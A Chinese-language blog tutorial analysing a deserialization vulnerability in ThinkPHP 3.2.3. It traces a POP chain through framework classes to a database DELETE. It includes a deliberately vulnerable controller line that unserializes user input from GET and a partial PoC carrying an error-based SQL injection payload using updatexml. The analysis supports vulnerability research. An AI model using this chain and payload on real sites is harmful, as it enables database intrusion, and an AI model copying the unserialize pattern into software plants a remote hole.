目錄

• 前言
• 魔術方法
• 復現
• 結語

前言

ThinkPHP,是為了簡化企業級應用開發和敏捷WEB應用開發而誕生的開源輕量級PHP框架。隨著框架代碼量的增加，一些潛在的威脅也逐漸暴露，本文給大家帶來的是對Thinkphp3.2.3版本框架里面的反序列化漏洞進行分析，淺談原理以及如何應用。

魔術方法

因為之前已經講過了，這里就簡單提一下，以下面這個魔術方法為例：

_destruct

該方法的作用是，某個對象的所有引用都被刪除或者當對象被顯式銷毀時執行。例如下面代碼：

<?phpclass User{    public function __destruct()    {echo "xino</br>";    }}$test = new User();$ser = serialize($test);unserialize($ser);?>

執行后會發現調用了魔術方法，我們要想辦法來尋找代碼之間的關系來構造 反序列化鏈，常見魔術方法如下：

了解完魔術方法如何觸發后便開始我們TP3反序列化漏洞的學習之旅。

復現

這里我是用小皮面板搭建好環境后開始我們的分析，下面是主界面：

需要在控制器IndexController.class.php 處寫入：

public function index(){    unserialize(base64_decode($_GET[1]));}

首先走到Library/Think/Image/Driver/Imagick.class.php ，代碼如下：

 public function __destruct()    {empty($this->img) || $this->img->destroy();    }}

這里有一個可控的變量img,因為該變量走向了destory()，于是我們尋找一下：

Library/Think/Session/Driver/Memcache.class.php ,該處有個一樣的方法：

 public function destroy($sessID)    {return $this->handle->delete($this->sessionName . $sessID);    }

我們會發現handle和sessionName參數是可控，因為走向了delete函數,于是繼續跟進尋找delete，在Mode/Lite/Model.class.php 處：

   public function delete($options = array())    {$pk = $this->getPk();if (empty($options) && empty($this->options["where"])) {    // 如果刪除條件為空 則刪除當前數據對象所對應的記錄    if (!empty($this->data) && isset($this->data[$pk])) {return $this->delete($this->data[$pk]);    } else {return false;    }}if (is_numeric($options) || is_string($options)) {    // 根據主鍵刪除記錄    if (strpos($options, ",")) {$where[$pk] = array("IN", $options);    } else {$where[$pk] = $options;    }    $options  = array();    $options["where"] = $where;}// 根據復合主鍵刪除記錄if (is_array($options) && (count($options) > 0) && is_array($pk)) {    $count = 0;    foreach (array_keys($options) as $key) {if (is_int($key)) {    $count++;}    }    if (count($pk) == $count) {$i = 0;foreach ($pk as $field) {    $where[$field] = $options[$i];    unset($options[$i++]);}$options["where"] = $where;    } else {return false;    }}// 分析表達式$options = $this->_parseOptions($options);if (empty($options["where"])) {    // 如果條件為空 不進行刪除操作 除非設置 1=1    return false;}if (is_array($options["where"]) && isset($options["where"][$pk])) {    $pkValue = $options["where"][$pk];}if (false === $this->_before_delete($options)) {    return false;}$result = $this->db->delete($options);		//數據庫驅動類中的delete()if (false !== $result && is_numeric($result)) {    $data = array();    if (isset($pkValue)) {$data[$pk] = $pkValue;    }    $this->_after_delete($data, $options);}// 返回刪除記錄個數return $result;    }

這里比較復雜，需要分析一下，pk,pk,pk,data,$options參數都是可控的，第二次調用該函數后是調用db(Library/Think/Db/Driver.class.php )里面的函數，進去看一下：

$table = $this->parseTable($options["table"]);$sql   = "DELETE FROM " . $table;return $this->execute($sql, !empty($options["fetch_sql"]) ? true : false);

這里只貼了比較關鍵的代碼，看到table經過parseTable處理之后進了sql語句，跟進了發現沒有過濾什么，直接返回了數據，最后調用了execute，我們分析其代碼：

 public function execute($str,$fetchSql=false) {$this->initConnect(true);if ( !$this->_linkID ) return false;$this->queryStr = $str;if(!empty($this->bind)){    $that   =   $this;    $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return """.$that->escapeString($val)."""; },$this->bind));}if($fetchSql){    return $this->queryStr;}

看到第二行是一個初始化連接的代碼，我們跟進到最后發現：

 public function connect($config = "", $linkNum = 0, $autoConnection = false)    {if (!isset($this->linkID[$linkNum])) {    if (empty($config)) {$config = $this->config;    }    try {if (empty($config["dsn"])) {    $config["dsn"] = $this->parseDsn($config);}if (version_compare(PHP_VERSION, "5.3.6", "<=")) {    // 禁用模擬預處理語句    $this->options[PDO::ATTR_EMULATE_PREPARES] = false;}$this->linkID[$linkNum] = new PDO($config["dsn"], $config["username"], $config["password"], $this->options);    } catch (\PDOException $e) {if ($autoConnection) {    trace($e->getMessage(), "", "ERR");    return $this->connect($autoConnection, $linkNum);} elseif ($config["debug"]) {    E($e->getMessage());}    }}return $this->linkID[$linkNum];    }

可以通過里面的相應代碼：

$this->config

建立數據庫連接，整個的POP鏈跟進順序如下：

__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

因為構造poc較長，這里只貼關鍵處，有興趣的小伙伴可以自行去構造:

  public function __construct(){    $this->db = new Mysql();    $this->options["where"] = "";    $this->pk = "id";    $this->data[$this->pk] = array("table" => "name where 1=updatexml(1,user(),1)#","where" => "1=1"    ); }

生成后傳入payload即可實現錯報注入，體現在payload里就是table這個語句，經過一串的操作使之與數據庫連接來執行sql語句：

結語

給大家帶來了tp3的反序列化漏洞分析，主要還是要理清各個鏈的關系以及如何讓它們聯系起來，有興趣的小伙伴可以自己去搭建嘗試，喜歡本文的小伙伴希望可以一鍵三連支持一下。

以上就是Thinkphp3.2.3反序列化漏洞實例分析的詳細內容，更多關于Thinkphp 反序列化漏洞的資料請關注其它相關文章！